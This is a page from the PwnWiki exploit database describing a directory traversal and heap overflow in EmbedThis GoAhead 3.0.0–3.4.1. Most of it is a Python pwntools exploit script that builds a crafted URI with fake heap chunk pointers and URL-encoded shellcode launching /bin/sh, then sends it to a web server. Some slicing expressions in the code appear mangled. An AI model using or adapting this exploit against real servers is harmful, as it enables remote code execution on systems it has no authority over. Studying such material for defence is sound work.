免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
INFO
EmbedThis GoAhead 3.0.0 through 3.4.1 does not properly handle path segments starting with a . (dot), which allows remote attackers to conduct directory traversal attacks, cause a denial of service (heap-based buffer overflow and crash), or possibly execute arbitrary code via a crafted URI.
EXP
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
def hex2url(i):
array = format(i, 'X')
if len(array) % 2 != 0:
array = '0' + array
ret = ''.join('%' + arrayi-2:i for i in xrange(len(array), 0, -2))
return ret
def make_fake_chunk(chunk_addr):
chunk = (chunk_addr & ~0xff) + 0x12f
fd = int(format(chunk, '08X'):6, 16)
bk = chunk
return fd, bk, chunk
pro = remote('localhost', 80)
chunk = 0x8057840
fd, bk, fake_chunk = make_fake_chunk(chunk)
print(hex(fd), hex(bk), hex(fake_chunk))
shellcode = '%eb%16%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90'
shellcode += "%eb%19%5e%31%d2%89%56%07%52%56%89%e1%89%f3%31%c0%b0%0b%cd"
shellcode += "%80%31%db%31%c0%40%cd%80%e8%e2%ff%ff%ff%2f%62%69"
shellcode += "%6e%2f%73%68"
shellcode_addr = fake_chunk + 4 * 4
offset = 0
exp = 'GET /'
exp += hex2url(fd) # fd
exp += hex2url(bk) # bk
exp += hex2url(0xbffff2ac - 20) # fd_next, stack
exp += hex2url(shellcode_addr) # bk_next
pad = fake_chunk - chunk - 16
print('pad:{0}'.format(pad))
# fake chunk
exp += 'A' * (fake_chunk - chunk - 16)
exp += hex2url(0x01020304) # prev_size
exp += hex2url(0x01020304) # size
exp += hex2url(chunk - 8) # fd
exp += hex2url(chunk - 8) # bk
exp += shellcode
print('--{}'.format(1024 - (fake_chunk - chunk) - 16 - len(shellcode)/3))
exp += '/./'
exp += hex2url(2) * 50
exp += 'A' * (1024 - (fake_chunk - chunk) - 16 - len(shellcode) / 3 - 50)
exp += '/.x'
exp += ' HTTP/1.0\r\n\r\n'
print(len(exp))
print(exp)
pro.send(exp)
PWNWIK.COM==免费、自由、人人可编辑的漏洞库
